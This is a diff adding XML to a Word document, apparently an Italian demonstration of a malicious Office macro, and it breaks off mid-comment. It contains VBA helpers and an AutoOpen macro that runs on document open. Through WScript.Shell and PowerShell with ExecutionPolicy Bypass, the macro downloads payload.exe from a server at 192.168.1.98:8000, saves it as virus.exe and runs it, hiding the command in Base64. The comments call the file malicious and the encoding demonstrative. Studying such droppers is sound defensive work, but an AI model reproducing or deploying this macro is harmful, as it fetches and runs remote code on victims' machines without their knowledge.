+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' Libera </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>l'oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XML</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objNode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objXML</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>End Function</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Converte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>una</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> input in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>dati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>binari</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>s As String) As Variant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim ado As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set ado = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ADODB.Stream</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 2 ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adTypeText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Charset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "us-ascii"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.WriteText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Position</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 1 ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adTypeBinary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stringaABinario</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ado.Close</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set ado = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>End Function</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titolo1"/>
@@ -339,6 +1771,917 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>CODICE MACRO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sub </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>AutoOpen(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDecodificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoDecodificato2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim codificato2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim shell As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set shell = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VBA.CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WScript.Shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDecodificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "(New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DownloadFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">('" &amp; </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>"http://192.168.1.98:8000/payload.exe" &amp; "', '" &amp; "C:\Users\crist\Downloads\virus.exe" &amp; "')"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>eseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    comandoDecodificato2 = " &amp; 'C:\Users\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>crist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\Downloads\virus.exe'"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codifico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>questa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>parte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> non </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>dovrebb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>esserci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, è solo a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scopo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>dimostrativo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = EncodeBase64(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDecodificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    codificato2 = EncodeBase64(comandoDecodificato2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in base64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, serve per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>convertire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>stringhe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>base64</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    comandoBase64 = "IEX([</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>System.Text.Encoding</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>decodifico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da base64 a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>normali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Replace(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">comandoBase64, "BASE64_ENCODED_COMMAND", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Replace(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>o</w:t>
